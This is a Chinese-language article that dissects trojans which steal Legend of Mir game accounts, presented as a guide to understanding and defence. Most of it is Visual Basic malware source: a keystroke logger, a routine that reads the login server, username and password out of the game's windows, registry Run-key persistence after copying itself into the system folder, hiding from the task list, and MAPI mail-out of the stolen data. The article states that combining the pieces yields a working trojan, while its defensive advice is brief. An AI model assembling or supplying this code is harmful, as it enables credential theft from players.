自從韓國的網絡遊戲傳奇於2002年十月進入我國後,在國內日漸風靡,遊戲玩家逐日增多,與此同時也出現了一些被稱爲傳奇木馬的惡意軟件,比如:傳奇異度靈盜,傳奇黑眼等等。這類軟件雖然工作方式有所不同,但都被設計的具有竊取遊戲帳號和密碼的功能。廣大玩家深受其害。所謂"知已知bi,百戰百勝"。爲了能更好的認識並防範這類軟件,本文將從編程的角度揭示其工作原理及相應的應付手段。
首先來說一下鍵盤記錄型的傳奇木馬。這類軟件與一般的鍵盤記錄軟件大同小異,只是在進行鍵盤記錄之前,先使用一個名爲FindWindow的API函數判斷傳奇是否在運行,如果是的話,啓動鍵盤記錄功能,否則不動作。FindWindow的VB聲名如下:
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
它可以用來返回符合指定類名(lpClassName)或窗口名(lpWindowsName)的窗口句柄。實現鍵盤記錄這個功能時,大多數人想到的應該是使用鉤子技術,HOOK用戶的擊鍵行爲。其實除此之外,還有一API函數,同樣可以輕鬆進行鍵盤記錄:GetAsyncKeyState,這個函數根據虛擬鍵表判斷按鍵類型。返回值爲一個16位的二進制數,如果被按下則最高位爲1,即返回-32767,聲名如下:
Private Declare Function GetAsyncKeyState Lib "user32" Alias "GetAsyncKeyState" (ByVal vKey As Long) As Integer
例程:
dim aKey as integer
dim keyResult as string
keyResult=GetAsyncKeyState(13)
if keyResult=-32767 then
aKey="Enter"
endif
這類擊鍵記錄型傳奇木馬雖然能絲毫不差的記錄傳奇玩家在遊戲中的所有擊鍵行爲,但往往需要對龐大的記錄文件進行仔細分析纔可能找到帳號和密碼,非常費時費力。而對付這種軟件的方法也非常簡單:輸入遊戲ID和密碼時,先隨意輸入200個字符,然後再清空輸入框,輸入你的正確信息,這樣即使有人得到了你的擊鍵記錄文件,不用但心!二三年內他還找不到你的正確ID和密碼!
另一種傳奇木馬的工作原理與上述完全不同,其核心是使用了一個功能強大的SendMessage函數,在其它API函數的配合下,直接抓取玩家輸入的遊戲帳號和密碼!相關函數聲名如下:
Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Private Const WM_GETTEXT = &HD
Private Const WM_GETTEXTLENGTH = &HE
Private Const GW_HWNDNEXT = 2
下面給出一段代碼,演示如何抓取傳奇所在服務器,遊戲帳號,密碼:
Dim tex As String, tex2 As String, tex5 As String, tex6 As String
Private Sub Form_Load()
TexServer.Text = ""
TexPass.Text = ""
TexUser.Text = ""
End Sub
Private Sub TimMain_Timer()
Dim HwndServer As Long
HwndServer = FindWindow(vbNullString, "傳奇客戶端")
If HwndServer <> 0 Then
Dim ServerOwner As String, HwndCombo As Long
ServerOwner = "TComboBox"
HwndCombo = FindWindowEx(HwndServer, 0, ServerOwner, vbNullString)
If HwndCombo <> 0 Then
Dim SevLength As Long, SevCon As String
SevLength = SendMessage(HwndCombo, WM_GETTEXTLENGTH, 0, 0)
SevLength = SevLength + 1
SevCon = Space(SevLength)
SendMessage HwndCombo, WM_GETTEXT, SevLength, ByVal SevCon
TexServer.Text = SevCon
End If
End If
Dim HwndMain As Long
HwndMain = FindWindow(vbNullString, "legend of mir2")
If HwndMain <> 0 Then
Dim PassOwner As String, HwndPass As Long
PassOwner = "TEdit"
HwndPass = FindWindowEx(HwndMain, 0, PassOwner, vbNullString)
If HwndPass <> 0 Then
Dim PassLength As Long, PassCon As String
PassLength = SendMessage(HwndPass, WM_GETTEXTLENGTH, 0, 0)
PassLength = PassLength + 1
PassCon = Space$(PassLength)
SendMessage HwndPass, WM_GETTEXT, PassLength, ByVal PassCon
TexPass.Text = PassCon
Dim HwndUser As Long, UserLength As Long, UserCon As String
HwndUser = GetWindow(HwndPass, GW_HWNDNEXT)
If HwndUser <> 0 Then
UserLength = SendMessage(HwndUser, WM_GETTEXTLENGTH, 0, 0)
UserLength = UserLength + 1
UserCon = Space(UserLength)
SendMessage HwndUser, WM_GETTEXT, UserLength, ByVal UserCon
TexUser.Text = UserCon
End If
End If
End If
End Sub
以上代碼實現了簡單的抓取功能,只能在Win9X下運行,WinNT/2000中禁止不同的進程間相互訪問數據,需要用到其它API創建一個數據共享才行。
對於這類軟件的防範,對於一般玩家來說比較難做到。最好的辦法是在傳 奇客戶端軟件中加入一段程序,當用戶輸入數據時,判斷是否有其它窗體向帳號密碼框發送消息,並做相應處理,即對SendMessage進行防範,這種代碼在網上有很多,而且能寫傳奇的韓國程序員想必也非等閒之輩,在下就不搬門弄斧了。
以上是對各類傳奇木馬核心功能的解析,接下來,我們來看它的其它功能。
1,開機自動運行
Private Declare Function RegcreateKey Lib "advapi32.dll" Alias "RegcreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Const REG_SZ = 1
Const HKEY_LOCAL_MACHINE = &H80000002
FileCopy "test.exe", "c:/windows/system/test.exe"
Dim ne As String
Dim na As String
SetMyValue HKEY_LOCAL_MACHINE, "SoftWare/Microsoft/Windows/CurrentVersion/Run", _
"wing", "c:/windows/system/test.exe"
Sub SetMyValue(hKey As Long, strPath As String, strValue As String, strData As String)
Dim keyHandle&
Dim lResult As Long
lResult = RegcreateKey(hKey, strPath, keyHandle&)
lResult = RegSetValueEx(keyHandle&, strValue, 0, REG_SZ, ByVal strData, Len(strData))
lResult = RegCloseKey(keyHandle&)
End Sub
以上給出一段例程,通過註冊表實現開機自動運行。但在下也不能保證每種軟件都是通過這種方法來實現的,也可能是修改Autoexec.bat,winstart.bat,win.ini,甚至是動態加載dll文件。
2,隱藏
這裏是指不出現在任務欄列表中,win9x中的實現代碼如下:
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
'這個函數可以獲得當前進程一個唯一的標識符。
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
'這個函數可以將進程 ID 號爲dwProcessID的進程註冊或取消註冊爲"服務器"。
'所用常量:
'這裏的常量也就是dwType的值。
Const RSP_SIMPLE_SERVICE = 1
Dim pid As Long, reserv As Long
'獲取當前進程ID
pid = GetCurrentProcessId()
'註冊爲服務器
regserv = RegisterServiceProcess(pid, RSP_SIMPLE_SERVICE)
最後是自動郵件發送功能,方法有很多種,可以利用VB自帶的MAPI控件,API,或是第三方控件。
以MAPI控件單獨發送郵件爲例:
MAPISession1.signOn
with MAPI Message1
.mcgindex=-1
.recipdisplayname="test"
.msgsubject="test2"
.msgnotetext="test3"
.sessionID=MAPIsession1.sessionID
.send
end with
將以上各部分代碼融合,即具有了一個傳奇木馬的所有基本功能,本文給出相關代碼只是希望各位能更好的瞭解它的工作原理,做到更好的防範,希望大家善用